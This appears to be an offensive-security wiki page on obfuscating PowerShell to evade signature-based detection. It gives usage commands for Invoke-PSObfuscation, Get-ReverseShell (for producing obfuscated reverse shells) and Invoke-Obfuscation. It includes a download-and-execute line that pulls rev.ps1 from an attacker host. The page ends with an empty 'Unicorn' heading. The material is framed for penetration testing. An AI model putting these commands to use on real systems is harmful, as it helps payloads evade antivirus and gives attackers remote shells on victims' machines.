PowerShell Obfuscation

Theory

Following techniques aiming to evade detection based on signatures by obfuscating PowerShell scripts and commands.

Practice

Invoke-PsObfuscation

invoke-psobfuscation is a powerfull powershell obfuscating tool.

We may use invoke-psobfuscation using pwshon a unix-like host

We can import the tool as follows.

Import-Module ./Invoke-PSObfuscation.ps1

To obfuscate a powershell file, use the following cmdlets.

# Using all switches
Invoke-PSObfuscation -Path in.ps1 -PipelineVariables -Pipes -Cmdlets -Methods -Integers -Aliases -Comments -NamespaceClasses -Variables -Strings -OutFile out.ps1

Get-ReverseShell

Get-ReverseShell is a tool with the sole purpose of producing obfuscated reverse shells for PowerShell.

We may use Get-ReverseShell using pwshon a unix-like host

We can import the tool as follows.

Import-Module ./get-reverseshell.ps1

To generate a revers shell, use the following cmdlets

# To stdout
Get-ReverseShell -Ip $IP -Port $PORT

# To file
Get-ReverseShell -Ip $IP -Port $PORT -OutFile /path/to/rev.ps1

Invoke-Obfuscation

Invoke-Obfuscation is a PowerShell v2.0+ compatible PowerShell command and script obfuscator. Even though it is quite old, it is still relevant for bypassing static detections.

We may use Invoke-Obfuscation using pwshon a unix-like host

We can import and start the tool as follows.

Import-Module ./Invoke-Obfuscation.psd1
Invoke-Obfuscation

Here are some usage examples:

# Set a payload from a ScriptBlock
Invoke-Obfuscation> set ScriptBlock iex(iwr http://ATTACKING-IP/rev.ps1 -UseBasicParsing)

# Set a payload from file
Invoke-Obfuscation> set ScriptPath /path/to/script.ps1

# Exemple: Obfuscate entire command as a String
Invoke-Obfuscation> STRING
Invoke-Obfuscation> 1

# You may chains obfuscation methods
# Exemple: Obfuscate entire command via HEX encoding 
Invoke-Obfuscation> MAIN
Invoke-Obfuscation> ENCODING
Invoke-Obfuscation> 2

# Choose a luancher
# Example: PowerShell luancher
Invoke-Obfuscation> MAIN
Invoke-Obfuscation> LAUNCHER
Invoke-Obfuscation> PS
Invoke-Obfuscation> 7

# Save payload to file
Invoke-Obfuscation> OUT
Enter path for output file (or leave blank for default): obf.ps1

Unicorn

Last updated 5 months ago